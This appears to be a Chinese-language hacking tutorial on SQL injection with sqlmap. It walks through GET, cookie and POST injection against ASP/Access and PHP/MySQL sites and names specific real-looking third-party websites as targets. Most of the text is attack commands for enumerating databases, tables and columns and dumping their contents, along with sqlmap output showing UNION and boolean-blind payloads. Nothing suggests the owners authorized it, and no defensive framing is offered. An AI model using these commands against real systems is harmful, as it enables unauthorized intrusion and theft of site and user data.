ASP:
1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入
)
2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)
3.结果显示出了服务器的的操作系统为Windows2003或是 XP,数据库类型等信息,没有显示出current user
4.kali Linux打开终端 输入命令 sqlmap -u 网址 --tables 最后会显示出几个表名
5.kali Linux打开终端 输入命令 sqlmap -u 网址 -T 表名 --columns ,会拆解出几个列名(-T 指定表名 --columns代表所有的列)
6.kali Linux打开终端 输入命令 sqlmap -u 网址 -T 表名 -C 列名1,列名2 --dump (-C指定要获得的数据的列名,--dump表示下载数据
7.sql不能注入,采取cookie注入 例如 :sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2
8.猜解表段也是一样的:sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2
如果说那个站点他装了防注入程序 拿我们正规的注入就不成效果就用到cookie中转注入
sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --level 2
Place: Cookie
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=230 AND 1870=1870
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: id=-3659 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(117)&CHR(120)&CHR(97)&CHR(113)&CHR(106)&CHR(83)&CHR(65)&CHR(100)&CHR(105)&CHR(111)&CHR(87)&CHR(110)&CHR(113)&CHR(112)&CHR(113)&CHR(113)&CHR(115)&CHR(106)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
[23:30:15] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[23:30:15] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xaweichi.com'
可以看到是cookies方式的注入
猜解表段也是一样的 sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2
猜解字段sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --columns -T manage --level 2
然后猜解内容
[4 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| classid | numeric |
| id | numeric |
| orderid | numeric |
| title | non-numeric |
sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --dump C "classid,id" -T manage --level 2
9.cookie注入不行用post注入
今天讲sqlmap post搜索框的注入
http://www.zjyingsong.com/product.asp
post注入框的注入原理 大家可以自己百度一下哦!
要进行post注入我们首先要抓包 。。
用burpsuite
打开浏览器
代理8080端口
好了 随便输入一个1字 burpsuite已经抓到包了
key=1&x=23&y=4
这条是有用的
然后我们启动sqlmap 构造一下 sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4"
Place: POST
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=1%' AND 1393=1393 AND '%'='&x=24&y=9
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: key=-3532%' UNION ALL SELECT NULL,NULL,CHR(113)&CHR(104)&CHR(101)&CHR(110)&CHR(113)&CHR(103)&CHR(109)&CHR(84)&CHR(80)&CHR(98)&CHR(100)&CHR(74)&CHR(105)&CHR(102)&CHR(102)&CHR(113)&CHR(105)&CHR(114)&CHR(108)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&x=24&y=9
---
[23:58:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[23:58:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.zjyingsong.com'
Place: POST
嗯 post型注入 然后我们就可以猜解了
和上节课的语法完全一模一样 sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --tables //猜解表段
sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --columns -T 表段 //猜解字段
sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --dump C "内容,内容," -T 刚才的表段 //猜解内容
PHP:
1.网址后面加上一撇 ' 报错,可以看到数据库信息
2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user ,提示id 有注入漏洞
3.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbms mysql -D 数据库 --tables (--dbms 指定数据库 -D指定具体数据库(名称 ))
4.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbms mysql --tables 第3步在指定具体数据库的情况下没有返回任何表,这里直接拆解表名
5..kali Linux打开终端 输入命令 sqlmap -u 网址 --dbms mysql -T 表名 --columns
6.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbms mysql -T 表名 -C 列名,列名 --dump